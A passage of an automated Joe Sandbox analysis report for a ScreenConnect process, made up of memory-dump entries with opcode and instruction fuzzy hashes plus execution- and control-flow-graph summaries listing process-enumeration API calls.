                                                                                                                                                                                • Opcode Fuzzy Hash: db92f38ab6952a00c3e5c45d7747cd3eabfdd3b1a97ec452ae7e1549a44676d9
                                                                                                                                                                                • Instruction Fuzzy Hash: F901F2715043009EE7208AA9C8C4B67BFDCEF46320F18C4AAED4D0A2C6D2799801CAB5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 88575d9983eec0dd37c4a19790c0887020e67a85d9f25d7cb918ad17e481bf77
                                                                                                                                                                                • Instruction ID: e89599ad779f39d32c51af23dcc1c865c103b28072fe77e58c1fe40a559cc371
                                                                                                                                                                                • Opcode Fuzzy Hash: 88575d9983eec0dd37c4a19790c0887020e67a85d9f25d7cb918ad17e481bf77
                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF08C77B0C2146FDB28CABAA40069BBBDECBD5224B14C07FE55DC3780E975A8018764
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 54f280c12b5d40cc7e9f29f96a6a6cdf1ca72063f1d7c4c9f8a7f3bda4a2c0b4
                                                                                                                                                                                • Instruction ID: bd09c4ccb497195ee8c3b0702ccd260977eb7e6bb984f82c2001b6af8ced528d
                                                                                                                                                                                • Opcode Fuzzy Hash: 54f280c12b5d40cc7e9f29f96a6a6cdf1ca72063f1d7c4c9f8a7f3bda4a2c0b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 25F0F0312012109FC716EB3CF820D8E3BE9DFC570035884AAE019CB255DB38FC099B95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 35211b5971613564edffa0d03f719ad848ce6be7a6fccf9ae155754952abe3ce
                                                                                                                                                                                • Instruction ID: 99b83e8de56f321c758f49a149394552f5bf23c14b3ca2f474459e3804950e85
                                                                                                                                                                                • Opcode Fuzzy Hash: 35211b5971613564edffa0d03f719ad848ce6be7a6fccf9ae155754952abe3ce
                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF02736A0C2945FC31587BA581469B7FDDCE86110704C1BED59CC3241D824A4028769
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4af12c9b0e4b1e36e3e740855ec7bab54225090a53bfe87d5eff76e4ef20baa3
                                                                                                                                                                                • Instruction ID: 2d644770631e90bca0735047b037017fed7288b6503b3c6f7d5ca2c9fd9c67c6
                                                                                                                                                                                • Opcode Fuzzy Hash: 4af12c9b0e4b1e36e3e740855ec7bab54225090a53bfe87d5eff76e4ef20baa3
                                                                                                                                                                                • Instruction Fuzzy Hash: 08F0F06210D2D04FC322877CA8616E83FE0DE922107484AEAD0C28B5A7D649B60AE369
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a76c81603a23581356cffb60c93174ff6396db4c2f4b006e16be6303e386bc9b
                                                                                                                                                                                • Instruction ID: ad9e730d69f6c2170ad39585a1d5f05791fb898a354682bcdf5456f30b756968
                                                                                                                                                                                • Opcode Fuzzy Hash: a76c81603a23581356cffb60c93174ff6396db4c2f4b006e16be6303e386bc9b
                                                                                                                                                                                • Instruction Fuzzy Hash: AAE07D37C8B000C6DA14904C58814F1E3EDCEFBB3671041F3C14C8710AD548021BC621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d062e72419c5b47f6c3232e15272cd12fc990bcdf956619e81a0ea12af250e0b
                                                                                                                                                                                • Instruction ID: 3b70c16aa27553aa03f961441f23a29eb622ea5b1b5c42390a1a62b0c31915f5
                                                                                                                                                                                • Opcode Fuzzy Hash: d062e72419c5b47f6c3232e15272cd12fc990bcdf956619e81a0ea12af250e0b
                                                                                                                                                                                • Instruction Fuzzy Hash: DAE09B36705E905FC721566858D4065BFD9CEAA255B3C85F1F4A5CB292E519CC134341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be65bd25e2b245697b3e91795800410901527624aaac6b9c52634d748a56b0bc
                                                                                                                                                                                • Instruction ID: 8aaa12c04dafea191c5dd0a558a1403a3c796ee9d7389ebbcd6aeb84d5c795c9
                                                                                                                                                                                • Opcode Fuzzy Hash: be65bd25e2b245697b3e91795800410901527624aaac6b9c52634d748a56b0bc
                                                                                                                                                                                • Instruction Fuzzy Hash: ECE0E5397042545FC3451738A8184AA3FE9DECA221314816BE506C33B2CE749C0687E0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 103fa1a1ba386352f523dcd87d7a212215cbb705627520900c94ca299f84a2e4
                                                                                                                                                                                • Instruction ID: 8297d2c059422186990158210a56bc2af4aeff60e5f1cb02f280d68acac63724
                                                                                                                                                                                • Opcode Fuzzy Hash: 103fa1a1ba386352f523dcd87d7a212215cbb705627520900c94ca299f84a2e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0A0363016008B8316E66DF820D9E37D9DBC4750354847EE019C7214EF25EC0A9B81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 97599cbee2f7fcf1511541e324b53ec535cbc183d11163f2a143c4113d5b5f19
                                                                                                                                                                                • Instruction ID: b98d1365dc83ca708b7dd8d297ebf18a34d105188d1e499f2e01164a262b4419
                                                                                                                                                                                • Opcode Fuzzy Hash: 97599cbee2f7fcf1511541e324b53ec535cbc183d11163f2a143c4113d5b5f19
                                                                                                                                                                                • Instruction Fuzzy Hash: 24E086323003149B97146BAE788C56FBADEEBC8A62794847DF60EC3340DE759C0683A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a5815e90f1d8e03e75e59cf917ccb3f00390bed24cf27d4a64b5baa11362c733
                                                                                                                                                                                • Instruction ID: 1a34c17b8a6d6f8765b28179b423ed9f4dfaa0703f26cfe357fe8559b9cb7472
                                                                                                                                                                                • Opcode Fuzzy Hash: a5815e90f1d8e03e75e59cf917ccb3f00390bed24cf27d4a64b5baa11362c733
                                                                                                                                                                                • Instruction Fuzzy Hash: 74E08C32B01D51AB8B20915C9954555B3CE8BA93A5F3D86B1F928CB380FA2ADC124380
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03a5ee63067ec5a7cc0f84caadf4224d626502f5a4109eb4656400fb0bb80c74
                                                                                                                                                                                • Instruction ID: d6a404265ab87856017bb8f9afbc06a959f4cd2be7f5fa79aa32299590275660
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a5ee63067ec5a7cc0f84caadf4224d626502f5a4109eb4656400fb0bb80c74
                                                                                                                                                                                • Instruction Fuzzy Hash: 52E06D31505248BFCB01DB74D811A8A7BF8EF06300B1141EAD844DB262DA306E169745
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ee74eec98717d77509fe28b44cf90cc4ed91a7659934fe7f1b1796ecc4e0dc78
                                                                                                                                                                                • Instruction ID: f489527dc926a60047be19e605e94d6abe2dc607b17b67f2965665bde9c8e3bb
                                                                                                                                                                                • Opcode Fuzzy Hash: ee74eec98717d77509fe28b44cf90cc4ed91a7659934fe7f1b1796ecc4e0dc78
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE0923960A680CFC7066B70981C49C7FB1EF0621138980E6D84A8B263CF358D06CB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a99d83e5f6ab914e20d3c1d58d58682eb48d560c5222b32a611ec90727c50f10
                                                                                                                                                                                • Instruction ID: 0ebcc9382dc98dcf020d3e995493282ab8378bb25b6d0ea00bd7102031ada307
                                                                                                                                                                                • Opcode Fuzzy Hash: a99d83e5f6ab914e20d3c1d58d58682eb48d560c5222b32a611ec90727c50f10
                                                                                                                                                                                • Instruction Fuzzy Hash: 66E0927450A288DFD741DFB4AA555EC7FB9DE0620070081DAD84997162D5306F0AAB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 11d08277b84ef1a061483f37fa44b64c3bfc7516089b03696fa126b7ff96cd13
                                                                                                                                                                                • Instruction ID: c851ae7a3c204edaad75331c71e07f6d901f1deeb10c9b60061fad5c4d2f2cd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 11d08277b84ef1a061483f37fa44b64c3bfc7516089b03696fa126b7ff96cd13
                                                                                                                                                                                • Instruction Fuzzy Hash: 19E0923111C3D00FC316D778B8506DC7FE1DE82214B080AEAD0C14B167C654BA0E93A9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8d27dbdcb808e6538bcb9c6e3e0a13a91de4b9b18304e4f7d2cf4b990c4cbede
                                                                                                                                                                                • Instruction ID: 7183442757ba9205b481ad41f5091451f2ae22102f6f2388bd9b59c4fbad4695
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d27dbdcb808e6538bcb9c6e3e0a13a91de4b9b18304e4f7d2cf4b990c4cbede
                                                                                                                                                                                • Instruction Fuzzy Hash: 40E04F74C04109AFC780DF7C8D562AABFF4EA08200B2486E9CC9ED7342E63196038B85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c97b502c9589689ed67ccdd3a49d1b8343af2eda6b1a52aa008c2361b86dc0df
                                                                                                                                                                                • Instruction ID: 592cde5ad8ba974aac8724479820682cda9b2feaf6ea0beab3d5fbbacfa8ae02
                                                                                                                                                                                • Opcode Fuzzy Hash: c97b502c9589689ed67ccdd3a49d1b8343af2eda6b1a52aa008c2361b86dc0df
                                                                                                                                                                                • Instruction Fuzzy Hash: 19D01726A5E2D45FDB02567868A20F97FF8DD8621831940D3D486CB093DA580A1BA7A6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0cc277549f32edce858c101adcf2bb45f1da715be3091a732f1fcc23cc889a09
                                                                                                                                                                                • Instruction ID: ab62f4b389287d776f38c2df09476313d5f2bc19ae1bc7d41135c01b2952df53
                                                                                                                                                                                • Opcode Fuzzy Hash: 0cc277549f32edce858c101adcf2bb45f1da715be3091a732f1fcc23cc889a09
                                                                                                                                                                                • Instruction Fuzzy Hash: 28E0EC3A3412149B82446B7DE81849E7FEEEBD9662354C136E91AD33A0DE709C028BE5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 383241848059734326315d8fb59016aae4c68b83c58ab41403678857d8b5dda6
                                                                                                                                                                                • Instruction ID: 55bcc5e1fa920c1ada1c95abd12530d412aaad2f8a1a037cb0a6bc671f1a9e5b
                                                                                                                                                                                • Opcode Fuzzy Hash: 383241848059734326315d8fb59016aae4c68b83c58ab41403678857d8b5dda6
                                                                                                                                                                                • Instruction Fuzzy Hash: 39E026A044C2C00FC3828B78A8A80D47FE0EF17220F884ACDD9C08F543D625648BCB42
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a37f5872c3a55aa85202fc0c8e06787ed48fb5a62c7b2ca978464a321c57ece1
                                                                                                                                                                                • Instruction ID: 33f665bf5667f3ddcd1cffe580d4d79914410be9d89d89b97fa58886845abdf7
                                                                                                                                                                                • Opcode Fuzzy Hash: a37f5872c3a55aa85202fc0c8e06787ed48fb5a62c7b2ca978464a321c57ece1
                                                                                                                                                                                • Instruction Fuzzy Hash: 27E0E53041A345AFC741DF249D06A8ABBF0AB05600F05C89AE889CB281D234AD4ADF92
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7e6a453bdc86ce072e55519a37b3cd1558b0fe777ac0553c0735b72f6bb8a565
                                                                                                                                                                                • Instruction ID: fdcddb031c3fb3b6ba34d40f138b811a3f48f02c95ff069bc82b8b599bd06e9b
                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6a453bdc86ce072e55519a37b3cd1558b0fe777ac0553c0735b72f6bb8a565
                                                                                                                                                                                • Instruction Fuzzy Hash: CCD01231911208FFCB00DFA4E90199D7BF9EB44300B5041E9D408E3210EE316F159741
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0955a4c75b04544e0b164b4b5491f221cb12f2a4bf745128cd394de9ed8b7358
                                                                                                                                                                                • Instruction ID: ae213d5c52d5826c76d221a9a4669c302db4ba907d08a2675dd40d5f5ccd4339
                                                                                                                                                                                • Opcode Fuzzy Hash: 0955a4c75b04544e0b164b4b5491f221cb12f2a4bf745128cd394de9ed8b7358
                                                                                                                                                                                • Instruction Fuzzy Hash: 16D05B7090620CEFDB40DFB4EA0195DB7FDEB44304B1081A9D909D3214EA316F059BC1

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:36
                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                execution_graph 31745 56e3468 31746 56e348c 31745->31746 31747 56e349c 31745->31747 31748 56e3495 31746->31748 31749 56e35e8 4 API calls 31746->31749 31750 56e35d7 4 API calls 31746->31750 31753 56e35e8 31747->31753 31760 56e35d7 31747->31760 31749->31746 31750->31746 31754 56e360d 31753->31754 31756 56e361d 31753->31756 31755 56e3616 31754->31755 31781 56e2940 31754->31781 31755->31746 31767 56e3768 31756->31767 31774 56e3757 31756->31774 31762 56e35e7 31760->31762 31763 56e3616 31760->31763 31761 56e360d 31761->31763 31764 56e2940 ProcessIdToSessionId 31761->31764 31762->31761 31765 56e3768 2 API calls 31762->31765 31766 56e3757 2 API calls 31762->31766 31763->31746 31764->31761 31765->31761 31766->31761 31772 56e3792 31767->31772 31773 56e377f 31767->31773 31768 56e3788 31768->31754 31769 56e38fa K32EnumProcesses 31770 56e3932 31769->31770 31770->31754 31772->31773 31784 56e294c 31772->31784 31773->31768 31773->31769 31778 56e3768 31774->31778 31775 56e3788 31775->31754 31776 56e38fa K32EnumProcesses 31777 56e3932 31776->31777 31777->31754 31779 56e294c K32EnumProcesses 31778->31779 31780 56e377f 31778->31780 31779->31778 31780->31775 31780->31776 31782 56e39a0 ProcessIdToSessionId 31781->31782 31783 56e3a13 31782->31783 31783->31754 31785 56e38a8 K32EnumProcesses 31784->31785 31787 56e3932 31785->31787 31787->31772

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 39910c0-3991175 call 39917d7 14 39911b8-399131e 0->14 15 3991177-399118d 0->15 49 3991327-39913e5 14->49 18 399118f 15->18 19 3991196-39911b6 15->19 18->19 19->14
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                • API String ID: 0-4248691736
                                                                                                                                                                                • Opcode ID: b883b028a0be2ceb0cd63499a8c771568cc00abd47f033bfa96468539876fecb
                                                                                                                                                                                • Instruction ID: 76efba8991c12f43e024298e0c9e9b47395d794d340fe9bb2065c550926ed1a9
                                                                                                                                                                                • Opcode Fuzzy Hash: b883b028a0be2ceb0cd63499a8c771568cc00abd47f033bfa96468539876fecb
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F9192306007099FC719EF78D591B9EBBE6FF84300B048A6AD0499B395DF75A90DCB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 65 39910d0-3991175 call 39917d7 77 39911b8-399131e 65->77 78 3991177-399118d 65->78 112 3991327-39913e5 77->112 81 399118f 78->81 82 3991196-39911b6 78->82 81->82 82->77
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                • API String ID: 0-4248691736
                                                                                                                                                                                • Opcode ID: d59e85b46291e8ff23c87dc6a4ba81c8daf1a906740ffb0ed29906eeda1c2375
                                                                                                                                                                                • Instruction ID: 33a892582466a4beca88ab8a480c32eba9a2a680132e24aebfebcaa698786385
                                                                                                                                                                                • Opcode Fuzzy Hash: d59e85b46291e8ff23c87dc6a4ba81c8daf1a906740ffb0ed29906eeda1c2375
                                                                                                                                                                                • Instruction Fuzzy Hash: E68192306007099FC719EF78D581B9EBBE6FF84300B048A6AD1499B755DF75A90DCB90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 128 11dc67f-11dc6b1 131 11dc6b3-11dc6e4 128->131 132 11dc6f2-11dc726 128->132 131->132 133 11dc72c-11dc744 132->133 134 11dca57-11dca5e 132->134 139 11dc766-11dc781 133->139 140 11dc746-11dc761 133->140 195 11dc786 call 11dcbb0 139->195 196 11dc786 call 11dcbc0 139->196 145 11dc80e-11dc811 140->145 197 11dc816 call 11df94f 145->197 198 11dc816 call 11df950 145->198 146 11dc78c-11dc7d4 199 11dc7d7 call 11ded38 146->199 200 11dc7d7 call 11ded28 146->200 201 11dc7d7 call 11decb1 146->201 202 11dc7d7 call 11decc0 146->202 147 11dc81c-11dc823 148 11dc829-11dc83f call 11d5c2c 147->148 149 11dca2b-11dca3e 147->149 157 11dc857-11dc880 148->157 158 11dc841-11dc847 148->158 152 11dca45-11dca49 149->152 155 11dca4b 152->155 156 11dca54 152->156 155->156 156->134 157->149 166 11dc886-11dc88c 157->166 159 11dc849 158->159 160 11dc84b-11dc84d 158->160 159->157 160->157 161 11dc7da-11dc800 167 11dc80b 161->167 168 11dc802 161->168 169 11dca40 166->169 170 11dc892-11dc8a9 166->170 167->145 168->167 169->152 170->169 172 11dc8af-11dc8d3 170->172 175 11dca1e-11dca25 172->175 176 11dc8d9-11dc972 call 11daab0 call 11db5a8 172->176 175->149 175->166 176->149 183 11dc978-11dc986 176->183 185 11dc988-11dc9ac 183->185 186 11dc9b1-11dc9c8 183->186 185->152 203 11dc9cb call 11dfa08 186->203 204 11dc9cb call 11df9e0 186->204 189 11dc9d1-11dca1c call 11d5c3c 189->152 195->146 196->146 197->147 198->147 199->161 200->161 201->161 202->161 203->189 204->189
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: a5cd47a6dbfa5da9e9c27c6f8163e9efdd426544c128b94a0325cec94823bbf5
                                                                                                                                                                                • Instruction ID: ae239b1d3958be6c099bbb3031e2e49bd926021b6d54667649c0f016b4634e5b
                                                                                                                                                                                • Opcode Fuzzy Hash: a5cd47a6dbfa5da9e9c27c6f8163e9efdd426544c128b94a0325cec94823bbf5
                                                                                                                                                                                • Instruction Fuzzy Hash: 27B18130A04319CFDB09EFA8C494BADBBB1FF85304F11895DD505AF265EB74A986CB81

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
